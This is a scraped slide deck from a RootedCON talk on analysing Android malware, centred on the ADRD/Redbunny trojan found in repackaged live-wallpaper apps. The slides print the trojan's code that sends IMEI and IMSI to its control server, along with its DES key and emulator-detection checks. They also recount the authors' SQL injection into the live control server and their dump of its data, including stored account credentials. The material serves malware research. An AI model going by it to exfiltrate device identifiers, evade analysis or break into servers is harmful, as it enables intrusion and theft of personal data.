SE2016 Android Denis Zhuchinski "Ways of enhancing application security"SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
 
Android crash debugging
Android crash debuggingAndroid crash debugging
Android crash debugging
 
KDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics TutorialKDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics Tutorial
 
Dmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI IntroDmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI Intro
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with Falco
 
Android Internals
Android InternalsAndroid Internals
Android Internals
 
Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoT
 
Hopping in clouds - phpuk 17
Hopping in clouds - phpuk 17Hopping in clouds - phpuk 17
Hopping in clouds - phpuk 17
 

More from RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 

More from RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Lost in Translation: Analyzing Malware on Android Phones

  • 1. ! Lost in translation WTF is happening inside my Android Phone Ok Cancel
  • 2. 8:30 PM Contents Contents Android System Static Analysis Dynamic Analysis Reversing Red Bunny Conclusion Cancel
  • 4. 8:30 PM DALVIK VM - Register-based virtual machine - It uses its own bytecode, not Java bytecode. - Run on a slow CPU with little RAM. - Run on an operating system without swap space. - Optimized for memory efficiency. - Dex class file format.
  • 5. 8:30 PM Dex file format header string_ids type_ids proto_ids field_ids method_ids class_defs data
  • 6. 8:30 PM Analysis Environment Tools Case-sensitive file system :D Android SDK Android NDK Android source code Eclipse Apktool, Dex2jar, JD-GUI Android Emulator
  • 7. 8:30 PM Example .java/jd-gui Compiler dex2jar .java/source .dex/dexdump .smali/baskmali baskmali
  • 8. 8:30 PM Anti-analysis Examples: - Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems. - Medium: Optimize/ofuscate the code with ProGuard. - Hard: Modify bytecode to break reversing tools (be sure that it still runs on Dalvik.) if self.__value_type >= VALUE_SHORT Ej: androguard-a1: ... elif self.__value_type == VALUE_ARRAY : ... elif self.__value_type == VALUE_BYTE : Insert value type ... VALUE_ANNOTATION elif self.__value_type == VALUE_NULL : ... elif self.__value_type == VALUE_BOOLEAN : ... else : raise(“oops”)
  • 9. 8:30 PM Dynamic Analysis Basic: - Create an Android Virtual Device. -> $android (SDK) - $emulator -port 5560 @virtual-device -tcpdump capture.pcap - $adb install app.apk - $adb shell monkey -v -p package.app 700 - $adb shell logcat -d && $adb shell logcat -b events -d (radio also) - $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
  • 10. 8:30 PM Make it more real - Simulate phone events: Send SMS: echo sms send +34656566789 test | nc localhost 5554 D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c Simulate calls: $echo gsm call +34656566789 |nc localhost 5554 $echo gsm accept +34656566789 |nc localhost 5554 $echo gsm cancel +34656566789 |nc localhost 5554 Change GPS coordinates: $echo geo fix -82.411629 28.054553|nc localhost 5554
  • 11. 8:30 PM Dynamic Analysis Advance: - Create you own system image and modify the java classes to log the program flow. Example, framework/base/core/java/android/os/ Process.java
  • 12. 8:30 PM Compiling Android Kernel modules $git clone git://android.git.kernel.org/kernel/common $git branch -a $git checkout --track -b android-goldfish-2.6.29 origin/android- goldfish-2.6.29 $adb pull /proc/config.gz ./;gunzip config.gz; mv config .config Edit and Add CONFIG_MODULES=y (disable by default on emulator kernel) $emulator -avd armv5y -kernel /tmp/zImage
  • 13. 8:30 PM System-Call Hooking $grep sys_call_table System.map
  • 14. 8:30 PM Anti-VM - Detecting the emulator is very easy: DEVICE_ID: String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID); boolean emulator = TextUtils.isEmpty(id); Solution: Change secure->android_id on data/data/com.android.providers.settings/databases/settings.db IMSI: TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE); String imsi = manager.getSubscriberId(); (00000... on emulator) Solution: Patch the emulator binary (search for +CGSN string) or the emulator source code (external/ qemu/telephony/android_modem.c).
  • 15. 8:30 PM More Anti-VM - LocationManager.NETWORK_PROVIDER -> IllegalArgumentException - Detect ADB stuff.. process, network, debug enabled... - /proc/cpuinfo - > Hardware : Goldfish - vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t change) (Thanks Ehooo) - Qemu specific detection (Google) Solution: Patch emulator, Qemu, system hooking...
  • 16. 8:30 PM Alternatives to Android Emulator - http://www.android-x86.org/ . Supports VMware - Use a real phone... Slower
  • 17. 8:30 PM Attack Vectors - Alternative markets, repacked applications. -SMS, MMS vulnerabilities, Fuzzing!!!. - Wireless, Bluetooth Drivers - NFC - System componentes: Webkit, sound library, Kernel.
  • 18. 8:30 PM Third party software Source: http://android.git.kernel.org/
  • 19. 8:30 PM ADRD aka Redbunny - "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" ( http://blog.aegislab.com/index.php? op=ViewArticle&articleId=75&blogId=1 ) ! Notification - "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]" - Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011: * Name: com.beautyfullivewallpaper * Date: Feb. 2, 2011, 1:49 p.m. - Also known as HongTouTou
  • 20. 8:30 PM Detection - Permission list:  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS.. - Cipher module/library calls (DES):  * init        Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt - Function calls to retrieve the IMSI/IMEI codes:  * IMEI:    getDeviceId       Lcom/xxx/yyy/MyService;    onCreate  * IMSI:    getSubscriberId     Lcom/xxx/yyy/MyService;    onCreate - HTTP Requests (GET and POST):  * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;  * adrd.xiaxiab.com     POST    /index.aspx? im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace 3ed65910991f4dbd438af
  • 21. 8:30 PM Detection - Sends http requests through a proxy:  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default- proxy", localHttpHost); - Services:  * com.xxx.yyy.MyService  * .beauty.Beauty - Intents:  * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup  * android.intent.action.PHONE_STATE  * android.net.conn.CONNECTIVITY_CHANGE
  • 22. 8:30 PM Analysis I Service module (MyService): Sets a Proxy for GET/POST and - Sets the preferred apn 1 HTTP specially crafted headers - Runs each 12 hours (UA, MIME types) - Looks for specific APN network : 2 “CMWAP” || “UNIWAP” Cipher data module Send data to adrd.taxuan.net/ public static String encrypt/decrypt 3 index.aspx?im=%s: Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding"); + IMEI + IMSI Loop + Netway (preferred APN) + Decrypt response + iversion + Switch(cmd) It depends on the + oversion 4 + 0 Do nothing + 1 adad.StartGo() adad.StartGo() + 2 ParseO 5 Sends http://adrd.xiaxiab.com/pic.aspx?im= + 3 UpdateHelper() +encrypt(IMEI+IMSI Parses the big list of ulrs/referers B#1#963a_w1|http://59.173.12.105/g/ UpdateHelper installs the update g.ashx?w=963a_w1 apk 6 BBBB.Go() -> Retrieves search lists of wap.baidu.com FixUrls(): Send random requests adding BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parse server response (number, flags, tags..): Sends log data to control servers 6 T213607170863|12345|+ -10086+ abc -597| [ ' 6
  • 23. 8:30 PM Analysis II - Following the encryption routines, the DES key is found…: this.kk = "48734154"; * UpdateHelper class: public class UpdateHelper { private static String savefilepath = "/myupdate.apk"; private Context ct; private int netway; * Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges. - Server URLs (there are more): http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA - We want to know more!!
  • 24. 8:30 PM Control Servers - adrd.xiaxiab.com from an eagle view: * Microsoft-IIS/6.0 * Debug Enabled (Displaying .NET errors and backtraces) * Hidden paths to the .Net/aspx application * ALL is Chinese! (WTF!?!"·$%&/(?) - Possible vector attacks: * HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
  • 25. 8:30 PM Control Servers - First results: Search * Exceptions in chinese. Google Translate is your friend * Errors at .NET (it didn't generate any html list/table, or view to use for data displaying) * We got a successful Sql injection after the last ciphered parameter :D). * User without admin privileges. * Permissions to run Backups + Shared Resources = Timeout * Other possibilities: + 1: Create a temporal db, with just one table each time, dump paginated rows and run backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang didn't help) + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for performance reason.
  • 26. 8:30 PM Database Information - All the scheme obtained: list of Tables, Fields, types, stored procedures - IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts - The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that points to adrd.xiaxiab.com/down.aspx ! * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int * Store procedure: --if (@netwap=2) select 'T-1|T11' --select 'T3http://adrd.xiaxiab.com/down.aspx' --select 'T213607170863|12345|+ -10086+ abc -597| [ ' --else --select 'T013607170863' * Looks that they were considering the netwap (based on the mobile operator) as a criteria to send commands * TX (where X seems to be a command type) * 13607170863 is a phone number located at Wuhan
  • 27. 8:30 PM Database Scheme t_baiduHourPercent: autoid, mHour, mPercent t_ : myear, mmonth, mday, mhour, total t_baidukeyword: keyword, viewcount t_ : way, flag t_baidukeywordflash: keyword t_baiduOrtherKey: keyword, viewcount t_ : keyword, flag t_baidupwd: id, way, username, pwd t_ _wap: keyword, flag t_baiduwayname: way, wayname t_ _wap_back : keyword, flag t_keywordResult: id, keyword, link, head, flag t_androidtemplog: id, imsi, way, result, createtime t_ _wap_back : keyword, flag t_keywordResult20100601: id, keyword, link, head, flag t_ : flag t_keywordResult20101108: id, keyword, link, head, flag t_ : keyword, createtime t_baiduHourPercent20101012: autoid, mHour, mPercent t_androidtemplog_backup: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_androidtemperrlog: id, compresslog, decompresslog, createtime t_ : keyword, createtime t_androidtemplog_backup201101: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_android : id, imei, imsi, logs, ip, createtime, netway t_android : , , , , createtime t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid t_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClick t_ _wap_20100323: keyword, createtime t_ _wap_20100722 : keyword, createtime
  • 28. 8:30 PM Myupdate.apk - It uses the main package of the ADRD family xxx.yyy. - The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS.. - Looks like a google reader - It adds a local sqlite DB (keyword storage). go_g1_sms: id, keyword, type, flag go_g2_sms: id, keyword, keyword2 - SMSObserver: * Replaces keywords on SMS’s. * Sends SMS!
  • 29. 8:30 PM Samples Package name Md5 Adrd Ver IVer com.beautyfullivewallpaper 4556a687a2845bf4dfac62c594938cf3 adrd.zt.cw.1 6 com.yodesoft.yohandcar 6783cee889fa64df68af58a56ff6e362 adrd.zt.2 6 com.binaryloft.live.winter aa5216da617839e818d83d8185da42b0 adrd.zt.jtj.2 6 com.magicwach.rdefense 839c37f3a2c8d31561d28f619a2a712e adrd.zt.cw.3 6 com.tat.livewallpaper.dandelion 5192ad05597e7a148f642be43f6441f6 adrd.zt.cw.4 6 com.classicnerds.livewallpaper.HK b72724d8fc0f633194dcc3bd28eec026 adrd.zt.cw.5 7 fishnoodle.night_city a01ba26a34e55f71873782348ff5e074 adrd.zt.dxm.6 7 com.appspot.swisscodemonkeys.steam cdfca19bf212adf3292e4fe677fe46a6 adrd.zt.cw.7 7 kr.mobilesoft.yxplayer e3cc6c7af0d83fe322116254c01cf720 adrd.zt.cw.8 7 com.labgency.wallpapers.waves 7d764347a0b0c9d11160d7a7684bf02b adrd.zt.dxm.8 7 com.laucass.andromax 627f41c8f8e7ab007641c4a0c1d8ce1b adrd.zt.cw.9 7 com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 drd.zt.cw.12 7 proscio.wallpaper.shamroc e09782d35d72a769dc7454adb6d8e2e9 adrd.zt.cw.15 7  com.tt.yy f2596f8f3c52381318f62d1ab161c284 ?? ??
  • 30. 8:30 PM Infections g Geolocation
  • 31. 8:30 PM Infections g Infections by operator +20K different IMSIs Other affected operators: Far EasT one Peoples Telephone Company Hutchison 3G PCCW Mobile Sunday Hong Kong Telecom Smart One Mobile
  • 32. 8:30 PM Thank You ! Questions? Ok Cancel @jaimeblascob @PabloForThePPL